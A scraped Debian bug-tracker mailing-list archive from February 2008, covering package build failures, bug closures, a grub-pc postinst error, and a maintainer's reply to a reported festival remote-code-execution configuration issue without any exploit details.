Processed: tagging 466146

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.15
> tags 466146 - pending
Bug#466146: festival: Default configuration allows unauthenticated remote code 
execution
Tags were: pending security
Tags removed: pending

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-16 Thread Kumar Appaiah
On Sun, Feb 17, 2008 at 05:51:38AM +, Tim Brown wrote:
> > A package is ready for upload at mentors. Thanks for the report. If,
> > after consulting my sponsor and some security people, I find that it
> > is OK, it shall be uploaded.
> 
> Kumar,
> 
> Can I suggest that a password is set (perhaps take a look at the Debian MySQL 
> server package which does something similar for the debian-sys-maint in 
> the /etc/mysql/debian.cnf file).  Limiting access to local hosts is an 
> improvement, but as noted it does not guard against local privilege 
> escalation attacks.

I shall make an attempt to arrange for this. Thank you for the
suggestion.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036


signature.asc
Description: Digital signature


Bug#466186: FTBFS on amd64: missing library libldap_r-2.4.so.2 (for wldap32.dll.so)

2008-02-16 Thread Julien Muchembled
> If it said "No shlibs information", then *that* would be a known bug in
> ia32-libs, and known to be the current reason for Wine to FTBFS on the
> amd64 build daemons.
(I'm not sure I understand what you say.)
There isn't any amd64 build daemon for Wine at this time: "Dep-Wait:
ia32-libs (>> 2.2)" because of libxml2 (#458013 & #456914).
On my PC, I edited /var/lib/dpkg/info/ia32-libs.shlibs manually in order
to build wine myself.

> But your error looks more like a problem that dpkg-shlibdeps used to
> only treat as a warning, not an error. Does the build actually stop
> there, and not because of some other error?
Yes it stops there.

Since I don't need libwine-ldap :
1. I added a 'bash -i' line before and after:
   dh_shlibdeps -s -Llibwine -ldebian/libwine/usr/lib'
2. before dh_shlibdeps, I did:
   $ mv debian/libwine-ldap/usr/lib/wine/wldap32.dll.so ..
3. after:
   $ mv ../wldap32.dll.so debian/libwine-ldap/usr/lib/wine/

(Finally, I got a libwine-ldap_0.9.54-1_amd64.deb package without any
dependency.)

> If so, what if you delete debian/amd64.tar.lzma.uu from the unpacked
> sources before building? That would build a Wine that only uses the
> 32-bit libraries that are actually available in ia32-libs (but might
> still fail due to "No shlibs information"...)
Oops. Not tried, and I should redownload the source package to test.
I've already upgraded Wine to 0.9.54-1.
Tell me if this test would be useful to you.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#465620: marked as done (enblend: FTBFS: Nonexistent build-dependency: libglew1.4-dev)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sun, 17 Feb 2008 05:47:07 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465620: fixed in enblend 3.0+dfsg-2
has caused the Debian Bug report #465620,
regarding enblend: FTBFS: Nonexistent build-dependency: libglew1.4-dev
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465620: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465620
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: enblend
Version: 3.0+dfsg-1
Severity: serious
User: [EMAIL PROTECTED]
Usertags: qa-ftbfs-20080212 qa-ftbfs
Justification: FTBFS on i386

Hi,

During a rebuild of all packages in sid, your package failed to build on i386.

Relevant part:
> ** Using build dependencies supplied by package:
 > Build-Depends: autotools-dev, debhelper (>= 5), dpatch, dpkg-dev (>= 
 > 1.14.6), freeglut3-dev, libboost-dev, libglew1.4-dev | libglew-dev, 
 > liblcms1-dev, libplot-dev, libtiff4-dev
 > Checking for already installed source dependencies...
 > W: Unable to locate package libglew1.4-dev
 > autotools-dev: missing
 > debhelper: missing
 > Using default version 6.0.5
 > dpatch: missing
 > dpkg-dev: already installed (1.14.16.6 >= 1.14.6 is satisfied)
 > freeglut3-dev: missing
 > libboost-dev: missing
 > libglew1.4-dev: missing
 > libglew-dev: missing
 > liblcms1-dev: missing
 > libplot-dev: missing
 > libtiff4-dev: missing
 > Checking for source dependency conflicts...
 > Reading package lists...
 > Building dependency tree...
 > Reading state information...
 > E: Couldn't find package libglew1.4-dev

The full build log is available from:
http://people.debian.org/~lucas/logs/2008/02/12

A list of current common problems and possible solutions is available at 
http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!

About the archive rebuild: The rebuild was done on about 50 AMD64 nodes
of the Grid'5000 platform, using a clean chroot containing a sid i386
environment.  Internet was not accessible from the build systems.

-- 
| Lucas Nussbaum
| [EMAIL PROTECTED]   http://www.lucas-nussbaum.net/ |
| jabber: [EMAIL PROTECTED] GPG: 1024D/023B3F4F |


--- End Message ---
--- Begin Message ---
Source: enblend
Source-Version: 3.0+dfsg-2

We believe that the bug you reported is fixed in the latest version of
enblend, which is due to be installed in the Debian FTP archive:

enblend_3.0+dfsg-2.diff.gz
  to pool/main/e/enblend/enblend_3.0+dfsg-2.diff.gz
enblend_3.0+dfsg-2.dsc
  to pool/main/e/enblend/enblend_3.0+dfsg-2.dsc
enblend_3.0+dfsg-2_amd64.deb
  to pool/main/e/enblend/enblend_3.0+dfsg-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Sebastian Harl <[EMAIL PROTECTED]> (supplier of updated enblend package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Wed, 13 Feb 2008 22:03:26 +0100
Source: enblend
Binary: enblend
Architecture: source amd64
Version: 3.0+dfsg-2
Distribution: unstable
Urgency: low
Maintainer: Debian PhotoTools Maintainers <[EMAIL PROTECTED]>
Changed-By: Sebastian Harl <[EMAIL PROTECTED]>
Description: 
 enblend- image blending tool
Closes: 465620
Changes: 
 enblend (3.0+dfsg-2) unstable; urgency=low
 .
   * Added libglew1.5-dev to the build dependencies to ease the libglew1.4 ->
 libglew1.5 transition and make sbuild happy (Closes: #465620).
Files: 
 a53c88b57761947eb6f30827db7e4593 981 graphics optional enblend_3.0+dfsg-2.dsc
 d2df34e89a3d05a3403c990570980fce 4718 graphics optional 
enblend_3.0+dfsg-2.diff.gz
 711db311206f6f6bc47a2229e8760bb9 908882 graphics optional 
enblend_3.0+dfsg-2_amd64.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHt8f701u8mbx9AgoRAtsmAKCS6wNN0e8ua0PK1NvzVNFPTjppHACeP3bq
H/A7K/S78uT+Ch/qkkoSgSE=
=k9pQ
-END PGP SIGNATURE-


--- End Message ---


Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-16 Thread Tim Brown
On Sunday 17 February 2008 05:13:21 Kumar Appaiah wrote:
> tags 466146 pending
> thanks
>
> Hi!
>
> A package is ready for upload at mentors. Thanks for the report. If,
> after consulting my sponsor and some security people, I find that it
> is OK, it shall be uploaded.

Kumar,

Can I suggest that a password is set (perhaps take a look at the Debian MySQL 
server package which does something similar for the debian-sys-maint in 
the /etc/mysql/debian.cnf file).  Limiting access to local hosts is an 
improvement, but as noted it does not guard against local privilege 
escalation attacks.

Tim
-- 
Tim Brown





-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#466186: FTBFS on amd64: missing library libldap_r-2.4.so.2 (for wldap32.dll.so)

2008-02-16 Thread Ove Kaaven

Julien Muchembled skrev:

Package: libwine-ldap
Version: 0.9.54-1
Severity: serious
Justification: no longer builds from source

I have libldap-2.4-2 (2.4.7-5) installed but I still get the following error:
dpkg-shlibdeps: failure: couldn't find library libldap_r-2.4.so.2 needed by 
debian/libwine-ldap/usr/lib/wine/wldap32.dll.so (its RPATH is '').

I suppose the problem is in ia32-libs.


If it said "No shlibs information", then *that* would be a known bug in 
ia32-libs, and known to be the current reason for Wine to FTBFS on the 
amd64 build daemons.


But your error looks more like a problem that dpkg-shlibdeps used to 
only treat as a warning, not an error. Does the build actually stop 
there, and not because of some other error?


If so, what if you delete debian/amd64.tar.lzma.uu from the unpacked 
sources before building? That would build a Wine that only uses the 
32-bit libraries that are actually available in ia32-libs (but might 
still fail due to "No shlibs information"...)






--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Processed: Re: Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> tags 466146 pending
Bug#466146: festival: Default configuration allows unauthenticated remote code 
execution
Tags were: security
Tags added: pending

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-16 Thread Kumar Appaiah
tags 466146 pending
thanks

Hi!

A package is ready for upload at mentors. Thanks for the report. If,
after consulting my sponsor and some security people, I find that it
is OK, it shall be uploaded.

Thanks!

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036


signature.asc
Description: Digital signature


Bug#466186: FTBFS on amd64: missing library libldap_r-2.4.so.2 (for wldap32.dll.so)

2008-02-16 Thread Julien Muchembled
Package: libwine-ldap
Version: 0.9.54-1
Severity: serious
Justification: no longer builds from source

I have libldap-2.4-2 (2.4.7-5) installed but I still get the following error:
dpkg-shlibdeps: failure: couldn't find library libldap_r-2.4.so.2 needed by 
debian/libwine-ldap/usr/lib/wine/wldap32.dll.so (its RPATH is '').

I suppose the problem is in ia32-libs.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (990, 'unstable'), (200, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.24.2-1 (SMP w/2 CPU cores)
Locale: LANG=fr_FR.UTF-8, LC_CTYPE=fr_FR.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#462439: marked as done (FTBFS with GHC 6.8.2)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sun, 17 Feb 2008 04:32:06 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#462439: fixed in hat 2.05+rerolled-5
has caused the Debian Bug report #462439,
regarding FTBFS with GHC 6.8.2
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
462439: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=462439
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: libghc6-hat-dev
Version: 2.05+rerolled-4
Severity: wishlist

6.8.2-1 has been in unstable for a few weeks now; please could you rebuild
this package against it?


Regards, 

-- 
Chris Lamb, UK   [EMAIL PROTECTED]
GPG: 0x634F9A20


signature.asc
Description: PGP signature
--- End Message ---
--- Begin Message ---
Source: hat
Source-Version: 2.05+rerolled-5

We believe that the bug you reported is fixed in the latest version of
hat, which is due to be installed in the Debian FTP archive:

hat_2.05+rerolled-5.diff.gz
  to pool/main/h/hat/hat_2.05+rerolled-5.diff.gz
hat_2.05+rerolled-5.dsc
  to pool/main/h/hat/hat_2.05+rerolled-5.dsc
hat_2.05+rerolled-5_i386.deb
  to pool/main/h/hat/hat_2.05+rerolled-5_i386.deb
libghc6-hat-dev_2.05+rerolled-5_i386.deb
  to pool/main/h/hat/libghc6-hat-dev_2.05+rerolled-5_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Arjan Oosting <[EMAIL PROTECTED]> (supplier of updated hat package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Sun, 17 Feb 2008 04:53:19 +0100
Source: hat
Binary: hat libghc6-hat-dev
Architecture: source i386
Version: 2.05+rerolled-5
Distribution: unstable
Urgency: high
Maintainer: Arjan Oosting <[EMAIL PROTECTED]>
Changed-By: Arjan Oosting <[EMAIL PROTECTED]>
Description: 
 hat- Haskell source-level tracer
 libghc6-hat-dev - Haskell source-level tracer library for ghc6
Closes: 462439
Changes: 
 hat (2.05+rerolled-5) unstable; urgency=high
 .
   * Set urgency to high as this upload fixes an RC bug.
   * Update for GHC 6.8.2 (Closes: #462439):
 - debian/control:
   + Bump build dependency on hmake to >= 3.13 which will work with
 GHC 6.8.2
   + Add libghc6-parsec-dev and libghc6-parsec-prof to the build
 dependencies
 - debian/patches/15_add-missing-packages.dpatch: Added. The base
   package has been split into several packages, so adjust the build
   system for that.
   * debian/control:
 - Replace the build dependency on libglib1.2-dev with libglib2.0-dev.
 - Replace Xs-Vcs-* fields with the now official Vcs-* fields.
 - Add a Homepage field.
 - Adjust the section of libghc6-hat-dev to libdevel to make lintian
   happy (dev-package-should-be-section-libdevel)
 - Bump Standards-Version to 3.6.3. No changes needed.
   * debian/copyright:
 - Fix lintian warning copyright-without-copyright-notice by
   replacing copyright with Copyright and (c) with ©.
   * debian/rules:
 - Remove generated file src/hattools/checkglib.h on clean.
 - Add '-optl -Wl,--as-needed' to the BUILDOPTS to unnecessary linkages
   introduced by the build system.
   * debian/patches/14_fix-manpage.dpatch:
 - Updated to fix man/hat-cover.1 as well.
   * debian/patches/19_glib2.0.dpatch:
 - Added. Build against glib-2.0 instead of glib-1.2.
   * debian/patches/20_install-all-interface-files:
 - Added. Fixes the hat/script/pkgdirlist script to return all
   directories containing .hx files, so all .hx will be installed.
Files: 
 1e8b12d55510fae4af1afb0e95194c4c 998 devel optional hat_2.05+rerolled-5.dsc
 4281bb75954c4ee8feee3f07440dacea 20525 devel optional 
hat_2.05+rerolled-5.diff.gz
 c7f692ddf327300b0492b3de2091 4316884 devel optional 
hat_2.05+rerolled-5_i386.deb
 1c41ffd6c724e3b719e20536b7a1fe38 4811250 libdevel optional 
libghc6-hat-dev_2.05+rerolled-5_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHt7RsUALvsZYuOJARAv8iAKDM0zWnirnNGSfvtVyrkTLEhnSzEQCfUs/Q
HdvZ1EnWHCBKvMmi4cFaHik=
=fniX
-END PGP SIGNATURE-


--- End Message ---


Processed: setting package to dpkg dpkg-dev dselect, tagging 311843

2008-02-16 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

> # Automatically generated email from bts, devscripts version 2.10.16
> package dpkg dpkg-dev dselect
Ignoring bugs not assigned to: dselect dpkg-dev dpkg

> tags 311843 + pending
Bug#311843: debsig-verify: Completely breaks installation of standard sarge 
packages
Tags were: patch sid lenny etch sarge
Tags added: pending

>
End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#466179: rsstail not working anymore

2008-02-16 Thread Bellegarde Cedric
Package: rsstail
Version: 1.4-1
Severity: critical

--- Please enter the report below this line. ---

With last libmrss0, rsstail isn't working (no output). Reinstall libmrss0 0.18 
fix the problem.

--- System information. ---
Architecture: i386
Kernel:   Linux 2.6.23.12gnumdk

Debian Release: lenny/sid
  500 unstableftp.fr.debian.org 
  500 stable  mirror.home-dn.net 
1 experimentalftp.fr.debian.org 

--- Package information. ---
Depends(Version) | Installed
-+-
libc6 (>= 2.7-1) | 2.7-8
libmrss0 (>= 0.18.0) | 0.19.0-1

-- 
Cédric




Bug#464951: twoftpd-run can't be removed: unable to open supervise/ok: file does not exist

2008-02-16 Thread Raphael Geissert
On Monday 11 February 2008, Gerrit Pape wrote:
> On Sat, Feb 09, 2008 at 07:01:48PM -0600, Raphael Geissert wrote:
> > Hello,
> >
> > Looking for a simple ftp server/daemon I installed twoftpd-run but after
> > being disappointed by its configuration system I decided to remove it.
> >
> > At installation time the postinst script already cause some troubles:
> > > ...
> > > Warning: The home dir /var/ftp you specified can't be accessed: No such
> > > file or directory
> > > ...
> >
> > But while removing:
> > > Removing twoftpd-run ...
> > > Stopping service twoftpd... warning: .: unable to open supervise/ok:
> > > file does not exist dpkg: error processing twoftpd-run (--purge):
> > >  subprocess pre-removal script returned error exit status 1
> > > dpkg: twoftpd: dependency problems, but removing anyway as you request:
> > >  twoftpd-run depends on twoftpd.
> > > Removing twoftpd ...
> > > Errors were encountered while processing:
> > >  twoftpd-run
> > > E: Sub-process /usr/bin/dpkg returned an error code (1)
> >
> > I've been able to reproduce this problem when performing a piuparts check
> > on sid. I'm attaching piupart's output.
>
> Hi Raphael, this can happen if the runit package hasn't been installed
> properly, I don't know about your system, but while piuparts check I
> guess adding an entry to /etc/inittab and doing kill -HUP 1 doesn't
> start the corresponding process in the piuparts chroot environment.
>
> On your system, do you use something different than sysvinit?  Do you
> know why the inittab entry added by runit didn't come into effect?
>

I use upstart since a while and haven't had any problem with it, *yet*. 

I was able to finish the removal of the package by running apt-get --purge 
remove twoftpd-run again (since one of the directories it checks for is 
removed on the first removal attempt it can't find it on the second run and 
quit gracefully). 

Other than that, no, I don't have any idea why it didn't come into effect.

> Regards, Gerrit.

Kind regards,
-- 
Atomo64 - Raphael

Please avoid sending me Word, PowerPoint or Excel attachments.
See http://www.gnu.org/philosophy/no-word-attachments.html



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#427311: marked as done (hmake: FTBFS: *** missing separator.)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sun, 17 Feb 2008 00:02:04 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#427311: fixed in hmake 3.13-0.1
has caused the Debian Bug report #427311,
regarding hmake: FTBFS: *** missing separator.
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
427311: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=427311
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: hmake
version: 3.12-1
Severity: serious
Justification: FTBFS on i386

Hi,

During a rebuild of all packages in sid, your package failed to build on i386.

Relevant part:
make[2]: Entering directory `/build/user/hmake-3.12/src/hmake'
/build/user/hmake-3.12/lib/debian/config:9: *** missing separator.  Stop.
make[2]: Leaving directory `/build/user/hmake-3.12/src/hmake'
make[1]: *** [targets/debian/hmake-ghc] Error 2
make[1]: Leaving directory `/build/user/hmake-3.12'
make: *** [build-stamp] Error 2

The full build log is available from
http://people.debian.org/~lucas/logs/2007/06/01/

About the archive rebuild: The rebuild was done on about 50 AMD64 nodes
of the Grid'5000 platform, using a clean chroot containing a sid i386
environment.  Internet was not accessible from the build systems.

-- 
| Lucas Nussbaum
| [EMAIL PROTECTED]   http://www.lucas-nussbaum.net/ |
| jabber: [EMAIL PROTECTED] GPG: 1024D/023B3F4F |

--- End Message ---
--- Begin Message ---
Source: hmake
Source-Version: 3.13-0.1

We believe that the bug you reported is fixed in the latest version of
hmake, which is due to be installed in the Debian FTP archive:

hmake_3.13-0.1.diff.gz
  to pool/main/h/hmake/hmake_3.13-0.1.diff.gz
hmake_3.13-0.1.dsc
  to pool/main/h/hmake/hmake_3.13-0.1.dsc
hmake_3.13-0.1_i386.deb
  to pool/main/h/hmake/hmake_3.13-0.1_i386.deb
hmake_3.13.orig.tar.gz
  to pool/main/h/hmake/hmake_3.13.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Arjan Oosting <[EMAIL PROTECTED]> (supplier of updated hmake package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Sat, 16 Feb 2008 23:02:48 +0100
Source: hmake
Binary: hmake
Architecture: source i386
Version: 3.13-0.1
Distribution: unstable
Urgency: high
Maintainer: Ian Lynagh (wibble) <[EMAIL PROTECTED]>
Changed-By: Arjan Oosting <[EMAIL PROTECTED]>
Description: 
 hmake  - The Haskell Make System
Closes: 427311 459737
Changes: 
 hmake (3.13-0.1) unstable; urgency=high
 .
   * Non-maintainer upload.
   * Set urgency to high as this upload fixes an RC bug.
   * New upstream release:
 * Dropped patch to script/fixghc (applied upstream).
 * Dropped patch to src/interpreter/Makefile (applied upstream).
 * src/interpreter/SimpleLineEditor.hs (applied upstream).
   * scripts/confhc:
 * Filter out LINE pragma when determining the version number of
   GHC. (Closes: #427311)
   * src/hmake/{Config.hs,PackageConfig.hs}:
 * Update the program to search for the imports in another directory
   if the GHC version >= 6.8 as of that version they are shipped in
   $ghclibdir/lib/$package instead of $ghclibdir/imports
   (Closes: #459737)
Files: 
 ca0ebd83fa71bba346ba462f857237ea 717 devel optional hmake_3.13-0.1.dsc
 c87f79f1846f6b5eccbe5f0a00928b8b 104283 devel optional hmake_3.13.orig.tar.gz
 0dc987739a727ef7fff276d8c48baaea 8403 devel optional hmake_3.13-0.1.diff.gz
 190ec5f5c943ad5c26f2426c4af1a208 1146548 devel optional hmake_3.13-0.1_i386.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHt17WUALvsZYuOJARAh77AJ9YQpi4qXrsd4Nnz/jIKAozJc3VHgCfe+1l
0Dd7ZoT6EAthn67TAqP6nGg=
=iqox
-END PGP SIGNATURE-


--- End Message ---


Bug#465708: marked as done (An error is made in postinst)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 23:47:05 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465708: fixed in grub2 1.96+20080216-1
has caused the Debian Bug report #465708,
regarding An error is made in postinst
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465708: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465708
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: grub-pc
Version: 1.96+20080213-1
Severity: important

A post-installation script can vomit an error and cannot install it.

The output of -x:
 Setting up grub-pc (1.96+20080213-1) ...
 + case "$1" in
 + . /usr/share/debconf/confmodule
 ++ '[' '!' '' ']'
 ++ PERL_DL_NONLAZY=1
 ++ export PERL_DL_NONLAZY
 ++ '[' '' ']'
 ++ exec /usr/share/debconf/frontend /var/lib/dpkg/info/grub-pc.postinst 
configure 1.96+20080210-1
 + case "$1" in
 + . /usr/share/debconf/confmodule
 ++ '[' '!' 1 ']'
 ++ '[' -z '' ']'
 ++ exec
 ++ '[' '' ']'
 ++ exec
 ++ DEBCONF_REDIR=1
 ++ export DEBCONF_REDIR
 + test -e /boot/grub/device.map
 + test -e /boot/grub/core.img
 + db_get grub-pc/linux_cmdline
 + _db_cmd 'GET grub-pc/linux_cmdline'
 + IFS=' '
 + printf '%s\n' 'GET grub-pc/linux_cmdline'
 + IFS='
 '
 + read -r _db_internal_line
 + RET=fillme
 + case ${_db_internal_line%%[   ]*} in
 + return 0
 + '[' fillme == fillme ']'
 + echo 'Internal error in grub-pc package.  Please file a bug report.'
 Internal error in grub-pc package.  Please file a bug report.
 + exit 1
 dpkg: error processing grub-pc (--configure):
  subprocess post-installation script returned error exit status 1


--- End Message ---
--- Begin Message ---
Source: grub2
Source-Version: 1.96+20080216-1

We believe that the bug you reported is fixed in the latest version of
grub2, which is due to be installed in the Debian FTP archive:

grub-efi_1.96+20080216-1_amd64.deb
  to pool/main/g/grub2/grub-efi_1.96+20080216-1_amd64.deb
grub-ieee1275_1.96+20080216-1_amd64.deb
  to pool/main/g/grub2/grub-ieee1275_1.96+20080216-1_amd64.deb
grub-linuxbios_1.96+20080216-1_amd64.deb
  to pool/main/g/grub2/grub-linuxbios_1.96+20080216-1_amd64.deb
grub-pc_1.96+20080216-1_amd64.deb
  to pool/main/g/grub2/grub-pc_1.96+20080216-1_amd64.deb
grub-rescue-pc_1.96+20080216-1_amd64.deb
  to pool/main/g/grub2/grub-rescue-pc_1.96+20080216-1_amd64.deb
grub2_1.96+20080216-1.diff.gz
  to pool/main/g/grub2/grub2_1.96+20080216-1.diff.gz
grub2_1.96+20080216-1.dsc
  to pool/main/g/grub2/grub2_1.96+20080216-1.dsc
grub2_1.96+20080216-1_amd64.deb
  to pool/main/g/grub2/grub2_1.96+20080216-1_amd64.deb
grub2_1.96+20080216.orig.tar.gz
  to pool/main/g/grub2/grub2_1.96+20080216.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Robert Millan <[EMAIL PROTECTED]> (supplier of updated grub2 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.7
Date: Sat, 16 Feb 2008 23:30:55 +0100
Source: grub2
Binary: grub2 grub-of grub-pc grub-rescue-pc grub-linuxbios grub-efi 
grub-ieee1275
Architecture: source amd64
Version: 1.96+20080216-1
Distribution: unstable
Urgency: high
Maintainer: GRUB Maintainers <[EMAIL PROTECTED]>
Changed-By: Robert Millan <[EMAIL PROTECTED]>
Description: 
 grub-efi   - GRand Unified Bootloader, version 2 (EFI version)
 grub-ieee1275 - GRand Unified Bootloader, version 2 (Open Firmware version)
 grub-linuxbios - GRand Unified Bootloader, version 2 (LinuxBIOS version)
 grub-pc- GRand Unified Bootloader, version 2 (PC/BIOS version)
 grub-rescue-pc - GRUB bootable rescue images, version 2 (PC/BIOS version)
 grub2  - GRand Unified Bootloader, version 2 (dummy package)
Closes: 465697 465706 465708
Changes: 
 grub2 (1.96+20080216-1) unstable; urgency=high
 .
   * New CVS snapshot.
 - Fixes offset calculation issue when installing on GPT (urgency set
   to high because of this).
   * Fix Vcs-Browser tag.  Thanks James.  (Cl

Bug#427311: Bug#459737: "Can't find ghc includes at /usr/lib/ghc-6.8.2/imports"

2008-02-16 Thread Arjan Oosting
Hi Ian,

I have prepared and will upload a NMU for hmake which fixes two bugs:
  * Bug#427311: hmake: FTBFS: *** missing separator.
  * Bug#459737: "Can't find ghc includes
at /usr/lib/ghc-6.8.2/imports"

The diff is attached.

Greetings Arjan 

hmake (3.13-0.1) unstable; urgency=high

  * Non-maintainer upload.
  * Set urgency to high as this upload fixes an RC bug.
  * New upstream release:
* Dropped patch to script/fixghc (applied upstream).
* Dropped patch to src/interpreter/Makefile (applied upstream).
* src/interpreter/SimpleLineEditor.hs (applied upstream).
  * scripts/confhc:
* Filter out LINE pragma when determining the version number of
  GHC. (Closes: #427311)
  * src/hmake/{Config.hs,PackageConfig.hs}:
* Update the program to search for the imports in another directory
  if the GHC version >= 6.8 as of that version they are shipped in
  $ghclibdir/lib/$package instead of $ghclibdir/imports
  (Closes: #459737)

 -- Arjan Oosting <[EMAIL PROTECTED]>  Sat, 16 Feb 2008 23:02:48 +0100

diff -Nru hmake-3.12/configure hmake-3.13/configure
--- hmake-3.12/configure	2008-02-17 00:44:46.0 +0100
+++ hmake-3.13/configure	2008-02-17 00:44:46.0 +0100
@@ -9,7 +9,7 @@
 
 # When incrementing this version number, don't forget to change the
 # corresponding definition in Makefile.inc!
-HMAKEVERSION="3.12 (2006-09-12)" export HMAKEVERSION
+HMAKEVERSION="3.13 (2006-11-01)" export HMAKEVERSION
 
 if uname >/dev/null 2>&1
 then OS=`uname -s`
diff -Nru /tmp/rYlbx7Ovhj/hmake-3.12/debian/changelog /tmp/9JeFm9DgiE/hmake-3.13/debian/changelog
--- hmake-3.12/debian/changelog	2008-02-17 00:44:46.0 +0100
+++ hmake-3.13/debian/changelog	2008-02-17 00:44:46.0 +0100
@@ -1,3 +1,22 @@
+hmake (3.13-0.1) unstable; urgency=high
+
+  * Non-maintainer upload.
+  * Set urgency to high as this upload fixes an RC bug.
+  * New upstream release:
